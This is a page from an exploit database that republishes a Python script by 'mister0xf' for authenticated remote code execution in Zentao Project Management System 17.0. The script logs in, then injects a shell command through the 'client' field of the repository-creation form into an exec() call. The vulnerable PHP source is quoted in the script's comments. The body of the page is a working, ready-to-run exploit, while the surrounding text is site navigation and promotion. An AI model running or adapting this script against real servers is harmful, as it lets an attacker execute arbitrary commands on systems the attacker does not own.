Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Zentao Project Management System 17.0 - Authenticated Remote Code Execution Exploit

🗓️ 27 Mar 2023 00:00:00Reported by mister0xfType 
zdt
 zdt🔗 0day.today👁 144 Views

Zentao Project Management System 17.0 - Authenticated Remote Code Executio

Code
# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE)
# Exploit Author: mister0xf 
# Software Link: https://github.com/easysoft/zentaopms
# Version: tested on 17.0 (probably works also on newer/older versions)
# Tested On: Kali Linux 2022.2
# Exploit Tested Using: Python 3.10.4
# Vulnerability Description:
# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing 
# remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver 

# Vulnerable Source Code:
# /module/repo/model.php:
# [...]
# $client = $this->post->client; // <-- client is taken from the POST request
# [...]
# elseif($scm == 'Git')
#        {
#            if(!is_dir($path))
#            {
#                dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path);
#                return false;
#            }
#
#            if(!chdir($path))
#            {
#                if(!is_executable($path))
#                {
#                    dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path);
#                    return false;
#                }
#                dao::$errors['path'] = $this->lang->repo->error->path;
#                return false;
#            }
#
#            $command = "$client tag 2>&1"; // <-- command is injected here
#            exec($command, $output, $result);

import requests,sys
import hashlib
from urllib.parse import urlparse
from bs4 import BeautifulSoup

def banner():
    print('''
          ::::::::: :::::::::: ::::    :::  :::::::: :::::::::::     :::      ::::::::
          :+:  :+:        :+:+:   :+: :+:    :+:    :+:       :+: :+:   :+:    :+:
        +:+   +:+        :+:+:+  +:+ +:+           +:+      +:+   +:+  +:+    +:+
      +#+    +#++:++#   +#+ +:+ +#+ +#+           +#+     +#++:++#++: +#+    +:+
    +#+     +#+        +#+  +#+#+# +#+           +#+     +#+     +#+ +#+    +#+
  #+#      #+#        #+#   #+#+# #+#    #+#    #+#     #+#     #+# #+#    #+#
######### ########## ###    ####  ######## ########### ###     ###  ########
    ''')
def usage():
    print('Usage: zenciao user password http://127.0.0.1/path')
    
def main():

    if ((len(sys.argv)-1) != 3):
        usage()
        banner()
        exit()

    #proxy = {'http':'http://127.0.0.1:8080'}

    banner()
    username = sys.argv[1] 
    password = sys.argv[2] 
    target = sys.argv[3]

    # initialize session object
    session = requests.session()
  
    home_url = target+'/index.php'
    rand_url = target+'/index.php?m=user&f=refreshRandom&t=html'
    login_url = target+'/index.php?m=user&f=login&t=html'
    create_repo_url = target+'/index.php?m=repo&f=create&objectID=0'

    r1 = session.get(home_url)
    soup = BeautifulSoup(r1.text, "html.parser")
    script_tag = soup.find('script')
    redirect_url = script_tag.string.split("'")[1]
    r2 = session.get(target+redirect_url)

    # get random value
    session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
    res = session.get(rand_url)
    rand = res.text

    # compute md5(md5(password)+rand)
    md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode())

    # login request
    post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""}
    my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html'
    session.headers.update({'Referer': my_referer})
    session.headers.update({'X-Requested-With': 'XMLHttpRequest'})
    response = session.post(login_url, data=post_data) 

    # exploit rce
    # devops repo page
    r2 = session.get(create_repo_url)
    git_test_dir = '/home/'
    command = 'whoami;'
    exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""}
    r3 = session.post(create_repo_url, data=exploit_post_data)
    print(r3.content)

if __name__ == '__main__':
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Mar 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8
zentao project management systemauthenticatedremote code executionvulnerabilityrceexploitgithubcommand injectionpython 3kali linuxsecurity document
144